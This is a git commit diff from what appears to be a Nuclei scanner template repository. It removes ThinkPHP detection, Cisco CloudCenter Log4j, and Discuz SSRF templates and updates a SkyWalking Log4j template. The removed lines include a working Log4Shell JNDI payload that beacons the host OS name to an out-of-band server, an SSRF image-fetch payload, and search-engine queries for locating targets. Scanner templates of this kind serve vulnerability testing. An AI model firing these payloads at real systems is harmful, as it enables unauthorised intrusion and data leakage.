Fix the Branch

2023-03-09 18:08:21 +05:30 · 2023-03-09 18:08:21 +05:30 · 6ecd5944de
parent 8d61080695
commit 6ecd5944de
4 changed files with 10 additions and 124 deletions
--- a/technologies/thinkphp-detect.yaml
+++ b/technologies/thinkphp-detect.yaml
@ -1,31 +0,0 @@
-id: thinkphp-detection
-
-info:
-  name: ThinkPHP - Detect
-  author: pwnhxl
-  severity: info
-  description: ThinkPHP Development framework Detect
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
-    cwe-id: CWE-200
-  tags: thinkphp,tech
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?s={{randstr}}&c={{randstr}}&a={{randstr}}&s={{randstr}}"
-
-    matchers-condition: or
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '/Library/Think/Think.class.php'
-          - '{ Fast & Simple OOP PHP Framework } -- [ WE CAN DO IT JUST THINK ]'
-        condition: or
-
-      - type: word
-        part: header
-        words:
-          - 'X-Powered-By: ThinkPHP'
--- a/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
+++ b/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
@ -1,57 +0,0 @@
-id: cisco-cloudcenter-suite-log4j-rce
-
-info:
-  name: Cisco CloudCenter Suite - Remote Code Execution (Apache Log4j)
-  author: pwnhxl
-  severity: critical
-  description: |
-    Cisco CloudCenter Suite - Remote Code Execution.
-  reference:
-    - https://logging.apache.org/log4j/2.x/security.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10
-    cve-id: CVE-2021-44228
-    cwe-id: CWE-77
-  metadata:
-    fofa-query: title="CloudCenter Suite"
-  tags: jndi,log4j,rce,oast,cloudcenter,cisco,cve,cve2021
-
-requests:
-  - raw:
-      - |
-        POST /suite-auth/login HTTP/1.1
-        Host: {{Hostname}}
-        Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
-        Content-Type: application/json
-
-        {"username":"test@test.com","password":"test","tenantName":"test"}
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol  # Confirms the DNS Interaction
-        words:
-          - "dns"
-
-      - type: regex
-        part: interactsh_request
-        regex:
-          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
-
-      - type: word
-        part: header
-        words:
-          - 'X-RateLimit-Limit-suite-gateway_suite-auth'
-
-    extractors:
-      - type: kval
-        kval:
-          - interactsh_ip # Print remote interaction IP in output
-
-      - type: regex
-        part: interactsh_request
-        group: 1
-        regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
--- a/vulnerabilities/discuz-downremoteimg-ssrf.yaml
+++ b/vulnerabilities/discuz-downremoteimg-ssrf.yaml
@ -1,34 +0,0 @@
-id: discuz-downremoteimg-ssrf
-
-info:
-  name: Discuz DownRemoteImg - Server-Side Request Forgery
-  author: pwnhxl
-  severity: high
-  description: Discuz DownRemoteImg - Server-Side Request Forgery
-  reference:
-    - https://cloud.tencent.com/developer/article/1511949
-    - https://github.com/opensec-cn/kunpeng/blob/master/plugin/go/discuzSSRF.go
-  metadata:
-    shodan-query: title:"Powered by Discuz"
-    hunter-query: web.body="Discuz! X3.1"
-  tags: discuz,ssrf
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/test?.jpg[/img]"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "ATTACHORIMAGE"
--- a/vulnerabilities/skywalking/skywalking-log4j-rce.yaml
+++ b/vulnerabilities/skywalking/skywalking-log4j-rce.yaml
@ -16,12 +16,15 @@ info:
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
+    verified: "true"
    fofa-query: title="SkyWalking"
-  tags: jndi,log4j,rce,oast,skywalking,cve,cve2021
+    shodan-query: http.favicon.hash:1929532064
+  tags: cve,cve2021,jndi,log4j,rce,oast,skywalking

 requests:
  - raw:
      - |
+        @timeout: 10s
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
@ -41,6 +44,11 @@ requests:
        regex:
          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable

+      - type: word
+        part: body
+        words:
+          - '"Invalid Syntax"'
+
    extractors:
      - type: kval
        kval:
@ -50,4 +58,4 @@ requests:
        part: interactsh_request
        group: 1
        regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output